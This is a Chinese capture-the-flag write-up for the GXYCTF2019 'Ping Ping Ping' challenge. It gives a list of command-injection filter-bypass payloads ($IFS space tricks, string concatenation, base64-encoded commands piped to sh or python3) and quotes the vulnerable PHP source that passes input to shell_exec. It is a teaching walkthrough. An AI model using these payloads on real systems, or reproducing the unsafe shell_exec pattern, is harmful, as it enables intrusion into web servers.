Ping Ping Ping

[GXYCTF2019]Ping Ping Ping

现在做一下关于常见的绕过ping执行其他命令的姿势,启动环境,连接并输入参数,查看当前目录下都有什么
))

ls命令没有被过滤,并且知道flag就在这个目录下面,用cat查看的flag的时候发现空格被禁用,绕过空格常用的方法有

{cat,flag.php} 
cat${IFS}flag.php
cat$IFS$9flag.php
cat<flag.php
cat<>flag.php
kg=$'\x20flag.php'&&cat$kg
a=c;b=at;c=flag.php;$a$b $c
b=ag;a=fl;cat$IFS$1$a$b.php
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|bash
echo$IFS$1aW1wb3J0IG9zCnByaW50KG9zLnN5c3RlbSgnY2F0IGZsYWcucGhwJykp|base64$IFS$1-d|python3

要是禁用cat的话可以用less、more、tac、ca\t等绕过

具体效果如下


在这题中试了好几个,试到第三个的时候发现有回显


查看源码的时候发现已经绕过,查看当前目录的所有文件的内容。(今年强网杯也出现了这个姿势)

cat `ls`
cat *

强网杯

当然也还有其他的姿势,不过我们先分析源码

/?ip=
<pre>PING 127.0.0.1 (127.0.0.1): 56 data bytes
<?php
$flag = "flag{f273e20f-2a0f-4914-9961-5acc4026f7f5}";
?>
/?ip=
<?php
if(isset($_GET['ip'])){
  $ip = $_GET['ip'];
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "<pre>";
  print_r($a);
}

?>

第一关是过滤掉一些特殊符号像:\、&、{、}、<、>、*等这些

 if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match))

所以我们只能用没有被过滤的符号组成payload

第二关是过滤了空格

 if(preg_match("/ /", $ip))

可以用 $IFS$9 来绕过

第三关是过滤了bash

 if(preg_match("/bash/", $ip))

可以用 echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 来绕过,这句话的意思是先把cat flag.php 进行base64加密然后解密再用sh执行并把结果输入出来

第四关是匹配一个字符串中,是否按顺序出现过flag四个字母

 if(preg_match("/.*f.*l.*a.*g.*/", $ip))

可以采用字符串拼接 b=ag;a=fl;cat$IFS$1$a$b.php 让他不按顺序出现就好


  转载请注明: XingHe Ping Ping Ping

  目录